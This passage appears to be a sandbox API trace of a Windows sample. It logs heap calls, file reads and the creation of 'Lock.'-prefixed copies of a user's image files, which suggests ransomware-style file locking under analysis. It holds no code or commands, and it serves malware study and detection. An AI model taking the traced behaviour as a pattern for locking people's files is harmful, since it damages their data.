HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0195.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0195.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24b7a48 [0195.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0195.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0195.956] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/co6M9Umeg.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\co6m9umeg.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0195.956] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.956] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0195.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0195.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0195.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0195.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0195.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0195.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0195.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0195.957] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0195.957] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0195.957] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0195.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0195.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0195.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0195.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0195.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0195.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0195.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0195.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0195.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0195.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0195.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0195.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24b30f8 [0195.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0195.958] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming")) returned 0x2010 [0195.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0195.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0195.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24c7a50 [0195.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0195.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0195.959] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.co6M9Umeg.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.co6m9umeg.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0195.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0195.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0195.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0195.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0195.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0195.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0195.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0195.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.960] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0195.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0195.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0195.960] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0195.960] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0195.960] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0195.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0195.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0195.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0195.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0195.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0195.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0195.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0195.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0195.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0195.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0195.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0195.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0195.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0195.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0195.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0195.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0195.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0195.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0195.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0195.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0195.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0195.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0195.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0195.962] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0195.962] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x8aa4, lpOverlapped=0x0) returned 1 [0195.964] ReadFile (in: hFile=0x294, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0195.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0195.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0195.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8aa4) returned 0x24d7a58 [0195.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0195.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0195.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0195.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0195.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0195.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0195.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0195.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0195.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8aa4) returned 0x24e0508 [0195.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0195.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.966] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0195.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0195.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8aa4) returned 0x24d7a58 [0195.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0195.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0195.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0195.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0195.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.967] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0195.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0195.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0195.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0195.967] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0195.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0195.968] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0195.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0195.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0195.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18c8 [0195.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0195.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0195.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0195.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0195.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8aa4) returned 0x24d7a58 [0195.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0195.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18b8 [0195.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0195.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1788 [0195.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0195.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0195.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0195.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c08 [0195.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0195.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0195.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0195.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0195.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0195.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0195.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0195.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0195.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0195.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0195.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0195.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8aa4) returned 0x24e8fb8 [0195.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0195.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0195.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0195.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0195.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0195.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0195.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0195.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0195.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0195.971] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0195.971] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0195.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0195.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0195.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0195.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0195.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.971] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0195.971] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0195.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.972] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0195.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0195.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.972] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0195.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0195.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0195.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | 